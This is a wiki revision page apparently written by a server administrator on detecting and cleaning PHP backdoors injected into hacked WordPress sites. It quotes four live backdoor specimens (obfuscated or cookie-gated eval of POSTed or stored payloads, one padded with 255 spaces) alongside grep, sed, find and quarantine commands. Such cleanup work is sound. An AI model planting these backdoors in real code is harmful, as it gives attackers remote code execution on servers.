PHP Hack Fix: Difference between revisions

From Leo's Notes
This page was last edited on 7 December 2015, at 18:22.
added more hacks found, structuring. Needs rejigging.
restructured content
Line 1: Line 1:
Typically, these PHP hacks are uploaded remotely through an already opened exploit such as an old install of WordPress. Remote exploits allow for arbitrary code execution which can do various things including adding backdoors to all .php files it encounters or by uploading a payload to the server to spam.
Typically, these PHP hacks are uploaded remotely through an already opened exploit such as an old install of WordPress. Remote exploits allow for arbitrary code execution which can do various things including adding backdoors to all {{code|.php}} files it encounters or by uploading a payload to the server to spam.


This page will contain the methods used to detect and remove these scripts.
This page contains some specimens that I've found and the possible method to find and fix them.


== Searching By String ==


== One Liner Hacks ==
The simplest backdoor is a one liner that is injected to either the first or last line of a {{code|.php}} file. The code may not end with a newline, so it might include the {{code|<?php}} start tag at the end. Some may try to hide itself by padding the start of the line with lots of spaces.
The simplest backdoor is a one liner that is injected to either the first or last line of a {{code|.php}} file. The code may not end with a newline, so it might include the {{code|<?php}} start tag at the end. Some may try to hide itself by padding the start of the line with lots of spaces.


=== Hack Specimens & Fixes ===
Because the script randomizes its strings and variables used, grepping for a specific string is not as reliable.
==== Hack 1 ====
 
=== Hack 1 ===
This one literally has 255 spaces before the start {{code|<?php}} tag instead of the comment.
This one literally has 255 spaces before the start {{code|<?php}} tag instead of the comment.


Line 15: Line 18:
}}
}}


 
==== Finding ====
===== Fix =====
 
The code is prefixed by 255 spaces, probably to hide the exploit if line wrapping is disabled. This makes it quite easy to search for this exploit through a simple grep:
The code is prefixed by 255 spaces, probably to hide the exploit if line wrapping is disabled. This makes it quite easy to search for this exploit through a simple grep:


  grep -iRl --include \*.php 'php                                                      ' *
  grep -iRl --include \*.php 'php                                                      ' *


==== Fixing ====
To fix the file, uses the following sed command which will delete everything until the first <code>?></code> string.
To fix the file, uses the following sed command which will delete everything until the first <code>?></code> string.
  sed '1s/^.*?>//'
  sed '1s/^.*?>//'
Line 33: Line 35:
}}
}}


 
=== Hack 2 ===
==== Hack 2 ====
Here's another which was used by a wordpress spammer.
Here's another which was used by a wordpress spammer.


Line 41: Line 42:
}}
}}


==== Hack 3 ====
=== Hack 3 ===
Here's another used by a wordpress spammer. This was found near the top of the file, after the file source header.
Here's another used by a wordpress spammer. This was found near the top of the file, after the file source header.


Line 48: Line 49:
}}
}}


==== Hack 4 ====
=== Hack 4 ===
Another, which was injected after Hack 3. This was found near the top of the file, after the file source header.
Another, which was injected after Hack 3. This was found near the top of the file, after the file source header.


Line 56: Line 57:




== More Complex Hacks ==
More complex hacks that depend on a dedicated PHP payload might be harder to find because they have no similar pattern due to the obfuscation techniques used.


Because the script randomizes its strings and variables used, grepping for a specific string is not as reliable.
Here are some methods which worked for me in the past.


== Searching By Size ==
== Searching By Size ==
 
Since hackers upload the *same* exploit in multiple locations, it's possible to find other exploits by size.
Since hackers upload the same exploits in multiple places, it's a good idea to keep copies of any found exploits and then search the compromised account for files of the same size.


A backdoor which I found was 510 bytes in size. Running the following command turned up more of the same exploits.
A backdoor which I found was 510 bytes in size. Running the following command turned up more of the same exploits.
Line 67: Line 69:


A spammer I found had a size of 64680 and later 64690.
A spammer I found had a size of 64680 and later 64690.
   find -type f -size 64680c -iname \*.php -exec  ls {} \;
   find -type f -size 64680c -iname \*.php -exec  ls {} \;
   find -type f -size 64690c -iname \*.php -exec  ls {} \;
   find -type f -size 64690c -iname \*.php -exec  ls {} \;




=== Quarantine ===
== Quarantine ==
I quarantine exploits using this method.
 
{{highlight|lang=bash|code=
{{highlight|lang=bash|code=
find -type f -size XXXXc -iname \*.php -exec  ls {} \; {{!}} while read i ; do Name=`echo $i {{!}} sed 's/\//-/g' {{!}} sed 's/\.-//g'` ; mv -v $i ~/abuse/username/$Name ; done
find -type f -size XXXXc -iname \*.php -exec  ls {} \; {{!}} while read i ; do Name=`echo $i {{!}} sed 's/\//-/g' {{!}} sed 's/\.-//g'` ; mv -v $i ~/abuse/username/$Name ; done
}}
}}


[[Category:Coding]]
[[Category:PHP]]
[[Category:Exploits]]

Revision as of 18:22, 7 December 2015

Typically, these PHP hacks are uploaded remotely through an already opened exploit such as an old install of WordPress. Remote exploits allow for arbitrary code execution which can do various things including adding backdoors to all .php files it encounters or by uploading a payload to the server to spam.

This page contains some specimens that I've found and the possible method to find and fix them.



One Liner Hacks

The simplest backdoor is a one liner that is injected to either the first or last line of a .php file. The code may not end with a newline, so it might include the <?php start tag at the end. Some may try to hide itself by padding the start of the line with lots of spaces.

Because the script randomizes its strings and variables used, grepping for a specific string is not as reliable.

Hack 1

This one literally has 255 spaces before the start <?php tag instead of the comment.

<?php      /* 255 spaces */       $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q945107'])){eval(${$s20}['q945107']);}?><?php

Finding

The code is prefixed by 255 spaces, probably to hide the exploit if line wrapping is disabled. This makes it quite easy to search for this exploit through a simple grep:

grep -iRl --include \*.php 'php                                                       ' *

Fixing

To fix the file, uses the following sed command which will delete everything until the first ?> string.

sed '1s/^.*?>//'

Warning: The above will nuke everything until the last ?> - If you know how to make it so it deletes everything up till the first one, update me!

You can then string up the commands to mass-fix exploited files:

grep -iRl --include \*.php 'php                                                       ' * | while read i ; do echo $i ; head -n 1 $i | grep -oH strtoupper && head -n 1 $i &&  sed '1s/^.*?>//' -i $i ; done

Hack 2

Here's another which was used by a wordpress spammer.

<?php if(md5($_COOKIE['4f898c79e5e6fabc'])=="44173dc1c859c258c840a03b9c9cb3e6"){ eval(base64_decode($_POST['file'])); exit; } ?><?php

Hack 3

Here's another used by a wordpress spammer. This was found near the top of the file, after the file source header.

$z=get_option("_site_transient_browser_06be457c3868ce83e6990f77fa29ea48"); $z=base64_decode(str_rot13($z['name'])); if(strpos($z,"E1B0095E")!==false){ $_z=create_function("",$z); @$_z(); }

Hack 4

Another, which was injected after Hack 3. This was found near the top of the file, after the file source header.

if(md5($_COOKIE['d7c2109b4acb080a'])=="a2b408d3d572cb36947be8bcdd3af53d"){ eval(base64_decode($_POST['file'])); exit; }


More Complex Hacks

More complex hacks that depend on a dedicated PHP payload might be harder to find because they have no similar pattern due to the obfuscation techniques used.

Here are some methods which worked for me in the past.

Searching By Size

Since hackers upload the *same* exploit in multiple locations, it's possible to find other exploits by size.

A backdoor which I found was 510 bytes in size. Running the following command turned up more of the same exploits.

 find -type f -size 510c -iname \*.php -exec  ls {} \;

A spammer I found had a size of 64680 and later 64690.

 find -type f -size 64680c -iname \*.php -exec  ls {} \;
 find -type f -size 64690c -iname \*.php -exec  ls {} \;


Quarantine

I quarantine exploits using this method.

find -type f -size XXXXc -iname \*.php -exec  ls {} \; | while read i ; do Name=`echo $i | sed 's/\//-/g' | sed 's/\.-//g'` ; mv -v $i ~/abuse/username/$Name ; done